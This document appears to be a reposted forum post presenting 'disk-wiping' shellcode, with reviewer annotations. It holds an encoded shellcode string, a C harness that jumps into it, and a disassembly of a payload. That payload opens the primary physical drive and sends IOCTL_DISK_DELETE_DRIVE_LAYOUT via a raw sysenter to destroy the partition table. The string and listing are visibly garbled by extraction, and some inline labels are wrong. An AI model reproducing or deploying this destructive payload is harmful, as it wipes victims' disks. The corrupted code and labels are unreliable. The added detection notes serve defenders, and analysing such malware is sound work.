Shellcode Source:
 
 
  
  The smallest "disk-wiping" ShellCode to date that needs no relocation - Dora
http://bbs.pediy.com/showthread.php?t=194664
 
 
 
Shellcode Source:
/*
 * Test harness from the original post: an alphanumeric-encoded byte string is
 * stored in a global char array, and main() transfers control to it with
 * `lea eax, <array>` / `call eax` inside an MSVC-style `_asm` block.
 *
 * NOTE(review): this line was damaged by extraction. `Char`, the
 * g_szfromshellcode / G_szfromshellcode case mismatch, the stray `""`
 * separators, the spaces inside the literals and the altered letter case are
 * not the author's text. The line is therefore kept verbatim, not repaired,
 * and the string as printed here is not the original byte sequence.
 *
 * NOTE(review): the disassembly below places the code at .data:004060xx, so
 * the array is executed from a data section. With DEP/NX enforced for the
 * process, `call eax` into that section would presumably fault; confirm
 * against the build settings the author used.
 *
 * Analysis context: according to the disassembly on this page, the decoded
 * payload opens \\.\PhysicalDrive0 for read/write and then issues a device
 * I/O request through a direct `sysenter`.
 */
Char g_szfromshellcode[] = "pyiiiiiiiiiiiiiiii7qzjaxp0a0akaaq2ab2bb0" "BBABXP8ABUJIRULKZLMQJLOPWP5PUP8GW5K03SQB" " CUCQHGREOTRTPEQVAYXGPEOX0LSUV7UPLMSUOPPP "" Rpv5nkhlk3jlwxlkqu5xpsrvrwlkdhlkpps4xgpek "" Lupupgps0ni0mkhmyruc8stmqp030upuplk704llk "" 2pelnmlkcpuxlkkhnkg7elnkptuwrxgszwlkpjuhl "" KAJQ0VCYORINK4TLKWSL7LKCUZXEI5VQEKCNKAUFH "" 09pfvdpuzklkpzets3koqvlkdlbknkrzglusyolku "" Tlkgsywoycukllkquklaoqnsknkkuqmliqux48gg5 "" Nlqlwpslwphgw5np4nupqlupkwsultf0up1xepjg3 "" Umhpygpcc7po7suolayupsswpo7quopsqwpblwpo7 "" 3UOT1TS0PR30KWSUOXCYWPCFUPO7RENL3UEP4PWPK "" wcunpwpwpepepszgpczwppjs3pjepazdc1x5pc07p "" kplmcullpplkcuodkoxplkzxnmrmmhlmrunxp3o0v "" 0RPBPPPRHEPKQEWUPPQBRPPV0QCH8ARGPWPC0NM2T "" A4ZXVOUDWP "; int main (int argc, char* argv[]) {    _asm    {        lea eax , G_szfromshellcode call        eax    }        return 0;}
The shellcode begins with its own small decoder stub written in assembly; it is very simple, so it is not posted here. Below is the code after decoding:
; ---------------------------------------------------------------------------
; Pfnshellcode -- disassembler listing (32-bit x86, Intel syntax) of the
; decoded payload, located in .data and referenced from _main.
;
; NOTE(review): the listing was damaged by extraction. Line breaks are lost,
; opcode-byte columns are partly replaced by words ("bayi", "for", "xx") and
; some mnemonics are split or missing. It is kept verbatim below; read the
; operands and the author's comments, not the byte columns.
;
; What the visible instructions do, in order:
;   1. Frame setup (sub esp, 80h), then the ASCII name labelled "createfilew"
;      is stored on the stack and its address passed to an inlined resolver.
;   2. Resolver: fs:30h -> PEB, [+0Ch] -> loader data, [+1Ch] -> module list,
;      lodsd -> next entry, [+8] -> image base, which the author treats as
;      kernel32.
;      NOTE(review): offset 1Ch in PEB_LDR_DATA is the initialization-order
;      list, not the load-order list named in the inline comment; which
;      module sits second in it is OS-version dependent -- confirm per target.
;   3. Export walk from e_lfanew (+3Ch) and the export directory (+78h).
;      NOTE(review): several inline labels look wrong for IMAGE_EXPORT_DIRECTORY:
;      +18h is NumberOfNames, +20h AddressOfNames, +24h AddressOfNameOrdinals
;      (not an "environment variable"), +1Ch AddressOfFunctions. The local
;      called processor_architecture only holds the resolved function address,
;      which is then copied into pcreatefilew.
;      The name match compares just two dwords ([esi] and [esi+4]), i.e. the
;      8-byte prefix "CreateFi", scanning from the end of the name table; the
;      loop has no visible lower bound on ecx if no name matches.
;   4. The UTF-16 string \\.\PhysicalDrive0 is built from dword immediates and
;      CreateFileW is called with access 0C0000000h (GENERIC_READ |
;      GENERIC_WRITE), share mode 3 and disposition 3 (OPEN_EXISTING).
;   5. With the handle in ebx, arguments including 7c100h are pushed, eax is
;      set to 42h, edx is pointed at the stack arguments and `sysenter` is
;      executed.
;      NOTE(review): 7c100h equals IOCTL_DISK_DELETE_DRIVE_LAYOUT; 42h is
;      presumably the NtDeviceIoControlFile service index on the Windows
;      build the author targeted -- confirm, as service indexes are
;      build-specific.
;
; Detection and mitigation notes for defenders:
;   - The final request bypasses the user-mode API layer (direct sysenter),
;     so user-mode API hooks do not observe it; kernel-side telemetry on
;     handle opens to the physical-disk device is the reliable signal.
;   - Opening \\.\PhysicalDrive0 for write normally requires administrative
;     rights; least-privilege execution blocks step 4.
;   - The code runs from a data section, which DEP/NX enforcement is designed
;     to stop.
; ---------------------------------------------------------------------------
. data:00406030 Pfnshellcode proc near;                   DATA XREF: _maino.data:00406030.data:00406030 szcreatefilew= byte ptr-80h.data:00406030                   szphysicaldrive0= byte ptr-74h.data:00406030 pcreatefilew= DWORD ptr-4ch.data:00406030 var_48= byte ptr-48h.data:00406030 szcrea= DWORD ptr-8.data:00406030 PROCESSOR                      _architecture= DWORD ptr-4.data:00406030 sztefi= DWORD ptr 8.data:00406030.data:00406030 55     Push ebp.data:00406031 8B EC mov ebp, esp.data:00406033 bayi EC-xx-XX Sub ESP, 80h.data:00406039 C7 65+ mov dword ptr [Ebp+szcreatefilew], ' AERC '; createfilew.data:00406040 C7 46+ mov dword ptr [ebp+szcreatefilew+4], ' Ifet '. data:00406047 C7 45 88 6 C-57+ mov dword ptr [ebp+szcreatefilew+8], ' Wel '. data:0040604e 8D             45 80   Lea EAX, [ebp+szcreatefilew].data:00406051 50 push eax.data:00406052 Push eax.data:00406053 ebp.data:00406054 8B EC mov ebp, esp.dat a:00406056, EC, sub ESP, 8.data:00406059 8B mov eax, [ebp+sztefi].data:004                      0605C ebx.data:0040605d Push esi.data:0040605e 57     Push edi.data:0040605f 8B mov ecx, [eax].data:00406061 8B mov EDX, [eax+4];. data:00406061;;                 Save String "Createfi". data:00406064 C7 FC xx 00+ mov [ebp+processor_architecture], 0.data:0040606b 4D F8  mov [Ebp+szcrea], ecx.data:0040606e, MOV [Ebp+sztefi], edx.data:00406071 64 A1 xx eax, large Fs:30h; Get _peb.data:00406077 8B 0C mov eax, [eax+0ch]; Get ldr_peb_ldr_data.data:0040607a 8B 1C mov esi, [eax+1ch];                             Get inloadordermodulelist (First-NtDll loadinfolist). data:0040607d AD LODSD ;                                                           loadinfolist++: Second-kernel32 loadinfolist.data:0040607d ;. data:0040607d; getdllinfo.data:0040607d;;. 
data:0040607e 8B mov eax, [eax+8];     Get kernel32_imagebase.data:00406081 8B F8 mov edi, eax.data:00406083 8B 3C mov EAX, [edi+3ch]; Get _image_dos_header.e_lfanew.data:00406086 8B for mov edx, [edi+eax+78h];             Get Export Table offset.data:0040608a D7      add edx, EDI; Export Table address.data:0040608c 8B 4 a mov ecx, [edx+18h]; Get exportdirectory->numberoffunctions.data:0040608f 8B 5A mov ebx, [edx+20h]; Get exportdirectory->addressoffunctions.data:0040608f;;. data:00406092 DF add ebx, edi.data:00406094.data:00406094 Getexportfunname_begi N:; CODE xref:pfnshellcode+6fj.data:00406094; pfnshellcode+77j.data:00406094 Dec ecx; Numberoffunctions--. data:00406095 8B 8B mov esi, [ebx+ecx*4].data:00406098 F7 a DD ESI, EDI;                   Get Kernel32 exportfunname.data:0040609a 8B F8 mov eax, [ebp+szcrea].data:0040609d 39 06   Cmp  [esi], eax.data:0040609f F3 jnz short getexportfunname_begin;                Numberoffunctions--. data:004060a1 8B mov eax, [ebp+sztefi].data:004060a4 39 46 04 CMP [esi+4], Eax.data:004060a7-EB jnz short getexportfunname_begin;. DATA:004060A7;; GETEXPORTFUNNAME_END.DATA:004060A9 8B 5A mov ebx, [edx+24h]; Get environment Variables rocessor_architecture.data:004060ac DF add ebx, Edi.data:004060ae 8B 0C 4 B m                   OV CX, [ebx+ecx*2].data:004060b2 8B 5A 1C mov ebx, [edx+1ch].data:004060b5 DF     Add ebx, edi.data:004060b7 8B 8B mov eax, [ebx+ecx*4].data:004060ba C7 add                EAX, EDI.DATA:004060BC FC mov [ebp+processor_architecture], EAX.DATA:004060BF 8B FC mov eax, [ebp+proceSSOR_ARCHITECTURE].DATA:004060C2 5F pop edi.data:004060c3 5E pop esi.dat                      A:004060c4 5B pop ebx.data:004060c5 8B E5 mov esp, ebp.data:004060c7 5D  Pop ebp.data:004060c8 B4 mov [Ebp+pcreatefilew], EAX.DATA:004060CB C7 8C 5C 5c+ mov dword ptr [EBP+SZPHYSICALDRIVE0], 5c005ch; Get "\\.\physicaldrive0\" (that is, the physical drive of this machine 0-> the primary hard drive). 
data:004060d2 C7 2E 5c+ mov dword ptr [EBP+SZPHYSICALDRIVE0  +4], 5c002eh.data:004060d9 C7 94 68+ mov dword ptr [ebp+szphysicaldrive0+8], 680050h.data:004060e0 C7 45 98 73+ mov dword ptr [ebp+szphysicaldrive0+0ch], 730079h.data:004060e7 C7 9C, 63+ mov dwo RD PTR [ebp+szphysicaldrive0+10h], 630069h.data:004060ee C7 A0, 6c+ mov dword ptr [ebp+szphysicaldrive0+1 4h], 6c0061h.data:004060f5 C7 A4 72+ mov dword ptr [EBP+SZPHYSICALDRIVE0+18H], 720044H.DATA:004060FC C7 A8, 76+ mov dword ptr [ebp+szphysicaldrive0+1ch], 760069h.dat      a:00406103 C7 AC 00 +/------------------00 C7 (B0) mov dword ptr [ebp+szphysicaldrive0+24h], 0;. data:0040610a 00; Createfilew (SZPHYSICALDRIVE0, generic_read| Generic_write, File_share_read | File_share_write, NULL, open_existing, NULL, NULL);. data:00406111 6A, push 0; Push null.data:00406113 6A, push 0; Push null.data:00406115 6A-Push 3; Push open_existing.data:00406117 6A, push 0; Push null.data:00406119 6A-Push 3; Push File_share_read | FILE_SHARE_WRITE.DATA:0040611B-C0 Pu, XXSH 0c0000000h; Push generic_read| generic_write.data:00406120 8D                       8C Lea EAX, [ebp+szphysicaldrive0].data:00406123 push EAX ;                   Push szphysicaldrive0.data:00406124 8B B4 mov eax, [ebp+pcreatefilew].data:00406127 FF D0 call eax; Call createfilew.data:00406129 8B D8 mov ebx, eax; Save hfile.data:00406129;;. data:0040612b 8D 4D B8 Lea ECX, [ebp+var_48].data:0040612e 8D                      B8 Lea edx, [ebp+var_48].data:00406131 C0 xor eax, eax.data:00406133 50 push eax; Push null.data:00406134 push eax; Push null.data:00406135 push eax; Push null.data:00406136 push eax;                       Push null.data:00406137 C1 7c100h.data:0040613c push ECX ; Push punkonw.data:0040613d-Push edx; Push punkonw.data:0040613e push eax; Push null.data:0040613f push eax; Push null.data:00406140 ebx; Push hfile.data:00406141 B8 (mov eax, 42h.data:00406146 8D F8 Lea edx, [esp+54h+szphysicaldrive0+18h]; Lea (& (DWORD) szphysicaldrive0-4). 
data:0040614a 0F Sysenter
 Analysis of a disk-wiping shellcode